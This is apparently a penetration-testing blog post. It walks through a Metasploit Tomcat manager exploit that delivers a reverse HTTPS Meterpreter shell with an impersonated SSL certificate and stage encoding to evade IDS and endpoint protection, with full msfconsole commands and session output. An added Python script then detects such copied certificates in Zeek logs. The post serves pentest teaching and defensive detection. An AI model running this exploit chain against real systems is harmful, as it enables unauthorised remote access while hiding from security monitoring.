Meterpreter with custom SSL-Certificate

--

This setup bypasses many IDS and endpoint protection products that detect Meterpreter by its network traffic rather than by the binary itself.

The example below uses a Tomcat exploit with a reverse Meterpreter shell over HTTPS and a custom SSL certificate, which bypasses the network IPS/IDS component of Symantec Endpoint Protection.

# push your actual module to the stack
msf5 exploit(multi/http/tomcat_mgr_upload) > pushm
# use ssl impersonate auxiliary
msf5 exploit(multi/http/tomcat_mgr_upload) > use auxiliary/gather/impersonate_ssl
# set an existing page as RHOST (you probably need an internet connection)
msf5 auxiliary(gather/impersonate_ssl) > set RHOST www.google.com
msf5 auxiliary(gather/impersonate_ssl) > run
...
[+] 172.217.22.4:443 - pem: /home/{HIDDEN}/.msf4/loot/20190822092326_default_172.217.22.4_172.217.22.4_pem_732180.pem
...

After the custom SSL certificate has been created, you can set up the Meterpreter handler:

# pop your module from the stack
msf5 auxiliary(gather/impersonate_ssl) > popm
msf5 exploit(multi/http/tomcat_mgr_upload) > set PAYLOAD windows/meterpreter/reverse_https
# set the custom SSL-Certificate
msf5 exploit(multi/http/tomcat_mgr_upload) > set HandlerSSLCert /home/{HIDDEN}/.msf4/loot/20190822092326_default_172.217.22.4_172.217.22.4_pem_732180.pem
# enable stage encoding
msf5 exploit(multi/http/tomcat_mgr_upload) > set EnableStageEncoding true
# ensure the verification on the custom certificate is enabled
msf5 exploit(multi/http/tomcat_mgr_upload) > set StagerVerifySSLCert true

Run the exploit:

msf5 exploit(multi/http/tomcat_mgr_upload) > exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:8443
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying RrXCapJj...
[*] Executing RrXCapJj...
[*] Undeploying RrXCapJj ...
[*] https://0.0.0.0.:8443 handling request from 10.10.10.10; (UUID: rdmovfni) Meterpreter will verify SSL Certificate with SHA1 hash cfcca6877ba70c4a16f18b8a557ea1d2bc3f3f85
[*] https://0.0.0.0:8443 handling request from 10.10.10.10; (UUID: rdmovfni) Encoded stage with x86/shikata_ga_nai
[*] https://0.0.0.0:8443 handling request from 10.10.10.10; (UUID: rdmovfni) Staging x86 payload (180854 bytes) ...
[*] Meterpreter session 1 opened (0.0.0.0:8443 -> 10.10.10.10:52436) at 2019-08-22 09:25:48 +0200
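From the defender's side, the handler certificate produced by impersonate_ssl only copies the fields of the real certificate; it is signed with a freshly generated key, so it cannot chain to the issuer it names, and the stager connecting to it sends no SNI. The following script is an added example (not part of the original post) that turns these properties into a detection heuristic over Zeek's ssl.log. It assumes ssl.log is written as JSON with the validate-certs policy loaded (fields id.orig_h, id.resp_h, id.resp_p, server_name, subject, issuer, validation_status); the log lines, IP addresses, issuer names and the OWN_DOMAINS list are constructed for illustration.

```python
"""Flag TLS sessions whose server certificate looks like a copy of a public
site's certificate but does not validate, as a handler set up like the one
in this post would present.

Added example, not part of the original post. It assumes Zeek's ssl.log
written as JSON with the validate-certs policy loaded, i.e. one object per
line with the fields id.orig_h, id.resp_h, id.resp_p, server_name, subject,
issuer and validation_status. The log lines, hosts, issuer names and domains
below are constructed for illustration.
"""
import json
import re

# Domains this organisation legitimately serves with private or self-signed
# certificates (constructed); untrusted certs naming anything else are suspect.
OWN_DOMAINS = (".corp.example",)

# Constructed sample log. Line 2 models a client talking to a handler on
# port 8443 that presents a self-made copy of www.google.com's certificate;
# line 3 is an ordinary internal self-signed service.
SAMPLE_SSL_LOG = """\
{"ts":1566458700.1,"uid":"C1","id.orig_h":"10.10.10.10","id.resp_h":"172.217.22.4","id.resp_p":443,"server_name":"www.google.com","subject":"CN=www.google.com,O=Google LLC,L=Mountain View,ST=California,C=US","issuer":"CN=Example Public CA,O=Example Trust Services,C=US","validation_status":"ok"}
{"ts":1566458748.5,"uid":"C2","id.orig_h":"10.10.10.10","id.resp_h":"203.0.113.7","id.resp_p":8443,"server_name":"","subject":"CN=www.google.com,O=Google LLC,L=Mountain View,ST=California,C=US","issuer":"CN=Example Public CA,O=Example Trust Services,C=US","validation_status":"unable to get local issuer certificate"}
{"ts":1566458760.0,"uid":"C3","id.orig_h":"10.10.10.11","id.resp_h":"192.168.5.20","id.resp_p":8443,"server_name":"intranet.corp.example","subject":"CN=intranet.corp.example,O=Example Corp","issuer":"CN=intranet.corp.example,O=Example Corp","validation_status":"self signed certificate"}
"""

CN_RE = re.compile(r"(?:^|,)\s*CN=([^,]+)")


def common_name(dn):
    """Extract the CN attribute from a Zeek-style comma-separated DN."""
    match = CN_RE.search(dn or "")
    return match.group(1).strip().lower() if match else ""


def name_matches(cn, host):
    """Does the certificate CN (possibly a single-label wildcard) cover the SNI host?"""
    if cn.startswith("*."):
        return host.endswith(cn[1:]) and host.count(".") == cn.count(".")
    return cn == host


def score_entry(entry, own_domains=OWN_DOMAINS):
    """Return (score, reasons) for one ssl.log record; 0 means nothing to see."""
    reasons = []
    status = entry.get("validation_status") or "missing"
    if status == "ok":
        return 0, reasons  # chain validates against the trust store
    reasons.append(f"certificate did not validate ({status})")

    cn = common_name(entry.get("subject", ""))
    sni = (entry.get("server_name") or "").lower()
    if cn and not sni:
        # Browsers always send SNI; a stager talking to a bare IP does not.
        reasons.append("no SNI sent although the certificate names a host")
    elif cn and sni and not name_matches(cn, sni):
        reasons.append(f"SNI {sni!r} does not match certificate CN {cn!r}")

    port = entry.get("id.resp_p")
    if port != 443:
        reasons.append(f"TLS on non-standard port {port}")

    if cn and not cn.endswith(own_domains):
        # An untrusted certificate carrying a third party's name is the core
        # signal: a copied certificate cannot chain to the real issuer.
        reasons.append(f"untrusted certificate names external host {cn!r}")
    return len(reasons), reasons


def parse_log(text):
    """Parse JSON-per-line ssl.log text, ignoring blank and comment lines."""
    return [json.loads(line) for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def find_suspicious(text, own_domains=OWN_DOMAINS, threshold=3):
    """Return records scoring at or above the threshold, highest score first."""
    hits = []
    for entry in parse_log(text):
        score, reasons = score_entry(entry, own_domains)
        if score >= threshold:
            hits.append({"uid": entry["uid"], "client": entry["id.orig_h"],
                         "server": f'{entry["id.resp_h"]}:{entry["id.resp_p"]}',
                         "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_SSL_LOG):
        print(f'{hit["uid"]} {hit["client"]} -> {hit["server"]} (score {hit["score"]})')
        for reason in hit["reasons"]:
            print("   -", reason)
```

With the constructed sample the only hit is C2 (untrusted certificate, no SNI, port 8443, external name); the internal self-signed service C3 stays below the threshold because its SNI matches and its name is on the organisation's own list. The failed-validation check alone would also catch the handler, but combining it with the SNI and name checks keeps ordinary internal self-signed services out of the alert queue.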


Written by Pentest Team @greenhats.com

A full-time white-hat hacking / pentesting company that always stays on the bleeding edge - https://www.greenhats.com
